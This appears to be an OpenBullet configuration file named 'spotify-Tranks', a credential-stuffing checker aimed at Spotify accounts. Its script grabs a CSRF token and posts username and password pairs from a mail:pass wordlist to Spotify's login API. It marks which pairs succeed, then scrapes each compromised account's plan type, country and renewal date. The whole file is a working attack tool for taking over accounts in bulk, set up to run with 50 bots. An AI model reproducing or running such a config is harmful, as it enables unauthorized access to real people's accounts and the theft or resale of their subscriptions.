[SETTINGS]
{
  "CreatorLK": "OB-23f244d14075df106e85c6a72d0f039d-LoliKEY",
  "Name": "spotify-Tranks",
  "SuggestedBots": 50,
  "LastModified": "2019-04-26T19:15:22.9474741+02:00",
  "AdditionalInfo": "",
  "KeysDB": "",
  "LocalKeysDB": "",
  "isWtoEdit": false,
  "Author": "Tranks",
  "Version": "1.2.2.4",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#try REQUEST GET "https://accounts.spotify.com/en/login?continue=https:%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2F" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Token PARSE "<COOKIES(csrf_token)>" LR "" "" -> VAR "CSRF" 

#Login REQUEST POST "https://accounts.spotify.com/api/login" 
  CONTENT "remember=true&username=<USER>&password=<PASS>&csrf_token=<CSRF>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  COOKIE "__bon: MHwwfC0xNDAxNTMwNDkzfC01ODg2NDI4MDcwNnwxfDF8MXwx" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#CHECK KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "\"displayName\":\"" 
  KEYCHAIN Failure OR 
    KEY "\"error\":\"errorInvalidCredentials\"" 

#Data REQUEST GET "https://www.spotify.com/us/account/overview/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#CHECK_Agin KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "Spotify Free" 
    KEY "Get Premium" 
    KEY "Premium Paused" 

#UN PARSE "<SOURCE>" LR "<h3 class=\"product-name\">" "</h3>" -> VAR "subscription" 

#CL PARSE "<SOURCE>" LR "card-profile-country\">" "</p>" -> CAP "Country" 

#E PARSE "<SOURCE>" LR "<b class=\"recurring-date\">" "<" -> CAP "Renew" 

IF "<subscription>" Contains "Premium for Students"
JUMP #fixtags
ENDIF
IF "<subscription>" Contains "<span class="icon-checkmark-wrap"><svg><use xlink:href="#icon-checkmark"></use></svg></span>Spotify Premium"
JUMP #fixtags
ENDIF
IF "<subscription>" Contains "<span class="icon-checkmark-wrap"><svg><use xlink:href="#icon-checkmark"></use></svg></span>Spotify Premium + Hulu"
JUMP #fixtags
ENDIF
IF "<subscription>" Contains "Premium for Students + Hulu"
JUMP #fixtags
ENDIF

#Tr PARSE "<SOURCE>" LR "<p class=\"subscription-status subscription-compact\">" "</p>" -> VAR "fstatus" 

IF "<fstatus>" Contains "You're a member of a family plan."
JUMP #fixtags
ENDIF

#plan1 FUNCTION Replace "Premium for Family" "Family Owner" "<subscription>" -> VAR "fixplan2" 

#an PARSE "<fixplan2>" LR "" "" -> VAR "subscription" 

#fixtags FUNCTION Replace "<span class=\"icon-checkmark-wrap\"><svg><use xlink:href=\"#icon-checkmark\"></use></svg></span>" "" "<subscription>" -> VAR "fixplan" 

FUNCTION Replace "Premium for Family" "member of Family" "<fixplan>" -> VAR "subPlan" 

#ks PARSE "<subPlan>" LR "" "" -> CAP "sup" "" "| By:Tranks" 

